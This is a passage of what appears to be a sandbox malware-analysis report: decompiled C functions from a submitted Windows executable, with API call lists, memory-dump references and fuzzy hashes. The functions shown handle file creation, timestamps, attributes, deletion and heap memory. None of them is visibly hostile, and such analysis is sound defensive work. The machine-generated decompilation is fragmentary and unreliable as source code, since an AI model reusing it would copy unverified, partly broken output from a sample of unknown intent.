				_push(0);
				 *((intOrPtr*)(_t76 - 4)) = 0;
				_push(_t76 - 0x24);
				_t38 = E003D3BBA(__ecx); // executed
				if(_t38 != 0) {
					_t70 =  *(_t76 - 0x20);
					E003D1732(_t76 - 0x24, _t68, 1);
					_t74 =  *((intOrPtr*)(_t76 + 8));
					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
					_t16 = _t70 + 1; // 0x1
					E003D18A9(_t74, _t16);
					_t47 =  *((intOrPtr*)(_t76 - 0x10));
					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
							E003E1B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
						} else {
							_t72 = _t70 >> 1;
							E003E1BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
							 *((short*)( *_t74 + _t72 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t74 + 4)));
						_push( *_t74);
						_push( *((intOrPtr*)(_t76 - 0x24)));
						E003E1C3B();
					}
					E003D18A9(_t74, E003F3E13( *_t74));
					_t55 = 1;
				}
				_t39 =  *((intOrPtr*)(_t76 - 0x24));
				 *((intOrPtr*)(_t76 - 4)) = 2;
				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
					if( *((char*)(_t76 - 0x14)) != 0) {
						E003DF445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
						_t39 =  *((intOrPtr*)(_t76 - 0x24));
					}
					L003F3E2E(_t39);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t55;
			}










                0x003d1e50
                0x003d1e55
                0x003d1e5e
                0x003d1e62
                0x003d1e65
                0x003d1e68
                0x003d1e6b
                0x003d1e6e
                0x003d1e71
                0x003d1e74
                0x003d1e75
                0x003d1e79
                0x003d1e7c
                0x003d1e7f
                0x003d1e86
                0x003d1e8e
                0x003d1e96
                0x003d1ea1
                0x003d1ea4
                0x003d1ea8
                0x003d1eae
                0x003d1eb3
                0x003d1ebd
                0x003d1ed5
                0x003d1ef6
                0x003d1ed7
                0x003d1ed7
                0x003d1edf
                0x003d1ee8
                0x003d1ee8
                0x003d1ebf
                0x003d1ebf
                0x003d1ec2
                0x003d1ec4
                0x003d1ec7
                0x003d1ec7
                0x003d1f06
                0x003d1f0c
                0x003d1f0e
                0x003d1f0f
                0x003d1f12
                0x003d1f1b
                0x003d1f21
                0x003d1f27
                0x003d1f2c
                0x003d1f2c
                0x003d1f30
                0x003d1f35
                0x003d1f3c
                0x003d1f44

                APIs
                • __EH_prolog.LIBCMT ref: 003D1E55
                  • Part of subcall function 003D3BBA: __EH_prolog.LIBCMT ref: 003D3BBF
                • _wcslen.LIBCMT ref: 003D1EFD
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$_wcslen
                • String ID:
                • API String ID: 2838827086-0
                • Opcode ID: db55bfe48cc4081b7ab41c0c3f3c4d2389b038715291a97cfcacb33d04bbba40
                • Instruction ID: 87914f2e012864a5fcfbd4d8d17cad96c5bc656343b296616fae6f4e0cb08bee
                • Opcode Fuzzy Hash: db55bfe48cc4081b7ab41c0c3f3c4d2389b038715291a97cfcacb33d04bbba40
                • Instruction Fuzzy Hash: 37314C72904109AFCF12DF99D945AEEBBF5BF18300F10016AE445AB351C7325E10DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E003D9DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t35;
				signed char _t50;
				signed int* _t52;
				signed char _t58;
				void* _t59;
				void* _t60;
				signed int* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t59 = __ecx;
				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 8));
				}
				_t52 = _a4;
				_t50 = 1;
				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
					_t58 = 0;
					_v25 = 0;
				} else {
					_t58 = 1;
					_v25 = 1;
				}
				_push(_t60);
				_t61 = _a8;
				if(_t61 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t50;
					if(( *_t61 | _t61[1]) == 0) {
						goto L9;
					}
				}
				_t63 = _a12;
				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
					_t50 = 0;
				}
				if(_t58 != 0) {
					E003E138A(_t52, _t58,  &_v24);
				}
				if(_v26 != 0) {
					E003E138A(_t61, _t58,  &_v8);
				}
				if(_t50 != 0) {
					E003E138A(_t63, _t58,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t35;
			}
















                0x003d9da2
                0x003d9da8
                0x003d9db1
                0x003d9dbc
                0x003d9dbc
                0x003d9dc2
                0x003d9dc8
                0x003d9dcb
                0x003d9ddc
                0x003d9dde
                0x003d9dd4
                0x003d9dd4
                0x003d9dd6
                0x003d9dd6
                0x003d9de2
                0x003d9de3
                0x003d9de9
                0x003d9df6
                0x003d9df6
                0x003d9deb
                0x003d9df0
                0x003d9df4
                0x00000000
                0x00000000
                0x003d9df4
                0x003d9dfb
                0x003d9e01
                0x003d9e0b
                0x003d9e0b
                0x003d9e0f
                0x003d9e16
                0x003d9e16
                0x003d9e20
                0x003d9e29
                0x003d9e29
                0x003d9e31
                0x003d9e3a
                0x003d9e3a
                0x003d9e4a
                0x003d9e58
                0x003d9e68
                0x003d9e70
                0x003d9e7c

                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003D73BC,?,?,?,00000000), ref: 003D9DBC
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 003D9E70
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: b715e7daf705af87db3c159ac896c55355d7adbb0e1c0afb20a369b0bc1cb909
                • Instruction ID: 8cd2f304da7d5796786a70b766bb3eaceb2d460d569a72dd57f9ea62c7a73ebd
                • Opcode Fuzzy Hash: b715e7daf705af87db3c159ac896c55355d7adbb0e1c0afb20a369b0bc1cb909
                • Instruction Fuzzy Hash: 2521D2322482859FC716DF35D491BABBBE8AF55304F09491FF4C587681D339D90C9B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003D966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
				short _v0;
				signed int _t27;
				void* _t29;
				signed char _t38;
				signed int _t42;
				long _t45;
				void* _t46;
				long _t48;

				E003EEC50(0x1000);
				_t38 = _a4104;
				_t46 = __ecx;
				_t42 = _t38 >> 1;
				if((_t38 & 0x00000010) != 0) {
					L3:
					_t48 = 1;
					__eflags = 1;
				} else {
					_t52 =  *((char*)(__ecx + 0x30));
					if( *((char*)(__ecx + 0x30)) != 0) {
						goto L3;
					} else {
						_t48 = 0;
					}
				}
				 *(_t46 + 0x20) = _t38;
				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
				_t27 =  *(E003DC27E(_t52, _a4100)) & 0x0000ffff;
				if(_t27 == 0x2e || _t27 == 0x20) {
					if((_t38 & 0x00000020) != 0) {
						goto L8;
					} else {
						_t39 = _a4100;
						_t29 = _t27 | 0xffffffff;
					}
				} else {
					L8:
					_t39 = _a4100;
					__eflags = 0;
					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
				}
				 *(_t46 + 8) = _t29;
				if(_t29 == 0xffffffff && E003DBB03(_t39,  &_v0, 0x800) != 0) {
					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
				}
				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
				 *((char*)(_t46 + 0x1c)) = 1;
				 *((char*)(_t46 + 0x15)) = 0;
				return E003E0602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
			}











                0x003d9673
                0x003d9679
                0x003d9685
                0x003d9687
                0x003d968c
                0x003d9698
                0x003d969a
                0x003d969a
                0x003d968e
                0x003d968e
                0x003d9692
                0x00000000
                0x003d9694
                0x003d9694
                0x003d9694
                0x003d9692
                0x003d96a9
                0x003d96ac
                0x003d96b7
                0x003d96bd
                0x003d96c7
                0x00000000
                0x003d96c9
                0x003d96c9
                0x003d96d0
                0x003d96d0
                0x003d96d5
                0x003d96d5
                0x003d96d5
                0x003d96dc
                0x003d96e6
                0x003d96e6
                0x003d96ec
                0x003d96f2
                0x003d971c
                0x003d971c
                0x003d971f
                0x003d972d
                0x003d9731
                0x003d974b

                APIs
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,003D9F27,?,?,003D771A), ref: 003D96E6
                • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,003D9F27,?,?,003D771A), ref: 003D9716
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: dc1444d70a0ce12fdcf8bd2839b4110db8b8861c6011f02b3a4e38bdfc25b925
                • Instruction ID: cb7f859cf2d2ba59aeb81fd675d8d42c7a4b8075c95667353e3b5b620ca22aee
                • Opcode Fuzzy Hash: dc1444d70a0ce12fdcf8bd2839b4110db8b8861c6011f02b3a4e38bdfc25b925
                • Instruction Fuzzy Hash: 7421CFB2104344AFE3318A65DC89FA7B7DCEB49330F110A1BFA95D66D1C7B4A8848731
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E003D9E80(void* __ecx) {
				long _v8;
				void* __ebp;
				long _t13;
				long _t15;
				signed int _t17;
				char* _t33;
				void* _t36;
				long _t37;
				void* _t39;

				_push(__ecx);
				_t36 = __ecx;
				_t33 = __ecx + 0x1e;
				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
					_t21 = __ecx + 0x32;
					goto L4;
				} else {
					if( *_t33 == 0) {
						L12:
						_t17 = _t13 | 0xffffffff;
					} else {
						_t21 = __ecx + 0x32;
						E003D6D5B(0x411098, _t39, __ecx + 0x32);
						L4:
						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
							_v8 = _v8 & 0x00000000;
							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
							_t37 = _t15;
							if(_t37 != 0xffffffff) {
								L10:
								asm("cdq");
								_t17 = 0 + _t37;
								asm("adc edx, 0x0");
							} else {
								_t13 = GetLastError();
								if(_t13 == 0) {
									goto L10;
								} else {
									if( *_t33 == 0) {
										goto L12;
									} else {
										E003D6D5B(0x411098, _t39, _t21);
										goto L10;
									}
								}
							}
						} else {
							_t17 =  *(_t36 + 0x28);
						}
					}
				}
				return _t17;
			}












                0x003d9e83
                0x003d9e86
                0x003d9e8d
                0x003d9e90
                0x003d9ea7
                0x00000000
                0x003d9e92
                0x003d9e95
                0x003d9f02
                0x003d9f02
                0x003d9e97
                0x003d9e97
                0x003d9ea0
                0x003d9eaa
                0x003d9eae
                0x003d9eb8
                0x003d9ec7
                0x003d9ecd
                0x003d9ed2
                0x003d9eee
                0x003d9ef3
                0x003d9ef8
                0x003d9efa
                0x003d9ed4
                0x003d9ed4
                0x003d9edc
                0x00000000
                0x003d9ede
                0x003d9ee1
                0x00000000
                0x003d9ee3
                0x003d9ee9
                0x00000000
                0x003d9ee9
                0x003d9ee1
                0x003d9edc
                0x003d9eb0
                0x003d9eb0
                0x003d9eb3
                0x003d9eae
                0x003d9e95
                0x003d9f01

                APIs
                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 003D9EC7
                • GetLastError.KERNEL32 ref: 003D9ED4
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: c5bb69a8cabc5b36b607aed970c52d0b3a2399e348edfe8ed0c8343af498a277
                • Instruction ID: 0df0cc1eeccbeba99ee20e1d373192c565ec6c572488680d7a4b228f1a341fa7
                • Opcode Fuzzy Hash: c5bb69a8cabc5b36b607aed970c52d0b3a2399e348edfe8ed0c8343af498a277
                • Instruction Fuzzy Hash: 4F11E532600704ABD726CB28E841BA6B7EDAB45361F514A2BE562D2BE0D770ED85C760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E003F8E54(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x4326e4, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E003F8C34();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E003F7A5E(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E003F91A8())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E003F8DCC(_t14);
					goto L6;
				}
				_t9 = E003F8E06(__ecx, _a8); // executed
				return _t9;
			}









                0x003f8e54
                0x003f8e54
                0x003f8e5a
                0x003f8e5f
                0x003f8e6d
                0x003f8e70
                0x003f8e72
                0x003f8e7d
                0x003f8e80
                0x003f8ea7
                0x003f8eb1
                0x003f8eb7
                0x003f8eb9
                0x00000000
                0x00000000
                0x003f8e98
                0x003f8e9a
                0x00000000
                0x00000000
                0x003f8e9d
                0x003f8ea2
                0x003f8ea3
                0x003f8ea5
                0x00000000
                0x00000000
                0x003f8ea5
                0x003f8e8f
                0x00000000
                0x003f8e8f
                0x003f8e82
                0x003f8e87
                0x003f8e8d
                0x003f8e8d
                0x003f8e8d
                0x00000000
                0x003f8e8d
                0x003f8e75
                0x00000000
                0x003f8e7a
                0x003f8e64
                0x00000000

                APIs
                • _free.LIBCMT ref: 003F8E75
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00411098,003D17CE,?,?,00000007,?,?,?,003D13D6,?,00000000), ref: 003F8EB1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                • Opcode ID: 2343919df4450c03f5d7839a9f14b99e3c278e3171937fdfc910658c13ca9d14
                • Instruction ID: 4fba7c51ce3b9a6b8070f8fcf60d64edd6f6343d309ed432df48d66b28e9d78e
                • Opcode Fuzzy Hash: 2343919df4450c03f5d7839a9f14b99e3c278e3171937fdfc910658c13ca9d14
                • Instruction Fuzzy Hash: 5DF0963260111D66DB2F6B259D05BBF775C8FB1BB0F264526FB14AA191DF70DD0181E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003E109E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 != 0) {
					_t14 = 0;
					_t17 = _v8;
					_t15 = 1;
					do {
						if((_t17 & _t15) != 0) {
							_t14 = _t14 + 1;
						}
						_t15 = _t15 + _t15;
					} while (_t15 != 0);
					if(_t14 >= 1) {
						return _t14;
					}
					return 1;
				} else {
					return _t8 + 1;
				}
			}









                0x003e10b2
                0x003e10ba
                0x003e10c1
                0x003e10c5
                0x003e10c8
                0x003e10ca
                0x003e10cc
                0x003e10ce
                0x003e10ce
                0x003e10cf
                0x003e10cf
                0x003e10d6
                0x00000000
                0x003e10d8
                0x003e10db
                0x003e10bc
                0x003e10be
                0x003e10be

                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 003E10AB
                • GetProcessAffinityMask.KERNEL32 ref: 003E10B2
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 3f22ebc9c024910cab54a0eeae29b593bcaccc4cbd90bae8eff1121f68bc3934
                • Instruction ID: c761cafe56f811e534f6b19fd7fb0035f7a8716d8e8c576d2d1c0d0244650ec0
                • Opcode Fuzzy Hash: 3f22ebc9c024910cab54a0eeae29b593bcaccc4cbd90bae8eff1121f68bc3934
                • Instruction Fuzzy Hash: 72E0DF32B211A9E7CF0A8BB69C059EB77EDEA442097218279E403E3141F930EE414AA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DA4ED(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E003EEC50(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t13 == 0 && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}







                0x003da4f5
                0x003da501
                0x003da509
                0x003da50e
                0x003da53a
                0x003da53a
                0x003da541

                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AttributesFile$_wcslen
                • String ID:
                • API String ID: 2673547680-0
                • Opcode ID: 13e000a38f654b2f5fc6d7b1d22b1a61359b9a663b6801e159f04fdf8ccb4e3e
                • Instruction ID: 63717c81a4fc4e6660308e1960a275e53087efce7357e9ddbc083205f071d6b2
                • Opcode Fuzzy Hash: 13e000a38f654b2f5fc6d7b1d22b1a61359b9a663b6801e159f04fdf8ccb4e3e
                • Instruction Fuzzy Hash: 41F0E533200109BBDF026F60EC01FDA3B6DAF05385F448062B844E5264DB31CAD8DB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DA1E0(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E003EEC50(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t11 == 0 && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}







                0x003da1e8
                0x003da1f1
                0x003da1f9
                0x003da1fe
                0x003da227
                0x003da227
                0x003da22e

                APIs
                • DeleteFileW.KERNELBASE(000000FF,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641,000000FF), ref: 003DA1F1
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641), ref: 003DA21F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DeleteFile$_wcslen
                • String ID:
                • API String ID: 2643169976-0
                • Opcode ID: 327be7c56b20c0b10d23a15f6056a10be4fd0321aecf6449a36c7d6d8c67c620
                • Instruction ID: c46ff53b1b41db00eae7eb737fa27a293fe01516a19c148835980d72d57aed5f
                • Opcode Fuzzy Hash: 327be7c56b20c0b10d23a15f6056a10be4fd0321aecf6449a36c7d6d8c67c620
                • Instruction Fuzzy Hash: 19E0D8321402197BDB029F61ED45FD9375CAF0C3C2F484432B944E6154EB71DED4DA54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E003EAC7C(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0x418438; // 0x76e9c100
				 *0x403278(_t5, _t13, _t16,  *[fs:0x0], 0x402641, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L003EEB32(); // executed
				_t8 =  *0x433178( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}









                0x003eac8d
                0x003eac94
                0x003eaca5
                0x003eacab
                0x003eacb0
                0x003eacb5
                0x003eacbf
                0x003eacc8

                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00402641,000000FF), ref: 003EACB0
                • OleUninitialize.OLE32(?,?,?,?,00402641,000000FF), ref: 003EACB5
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
